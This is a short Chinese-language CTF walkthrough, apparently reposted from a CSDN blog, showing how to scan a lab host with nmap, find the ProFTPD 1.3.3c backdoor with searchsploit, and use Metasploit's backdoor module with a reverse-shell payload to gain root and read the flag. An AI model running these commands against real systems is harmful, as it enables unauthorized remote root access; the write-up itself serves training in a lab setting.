4-1CTF夺旗入门教程--FTP服务后门利用

1.信息探测

#开放服务信息
nmap -sV 192.168.2.113
#挖掘全部信息
nmpa -A -v -T4 192.168.2.113

2.查找对应漏洞

#对应FTP版本为ProFTPD 1.3.3c
#查找对应漏洞
searchsploit ProFTPD 1.3.3c

3.使用metasploit进行溢出

msfconsole
#输入search对应的软件及版本号
>search ProFTPD 1.3.3c
#exploit/unix/ftp/proftpd_133c_backdoor
>use exploit
>show payloads
#set payload
>set payload cmd/unix/reverse
>show options
#set rhosts
>set rhosts 192.168.2.113
#set lhost
>set lhost 192.168.2.110
>exploit
>id
#获取root权限

优化会话显示带用户、目录的命令行界面

python -c "import pty;pty.spawn('/bin/bash')"

4.获取flag

cd /root/
ls
cat flag.txt
#测试文档、总结文档
writeup

5.总结

对于开放FTP、SSH、Telnet服务的系统,可以尝试一些对应服务版本的漏洞代码

猜你喜欢

转载自blog.csdn.net/m0_46622606/article/details/105162889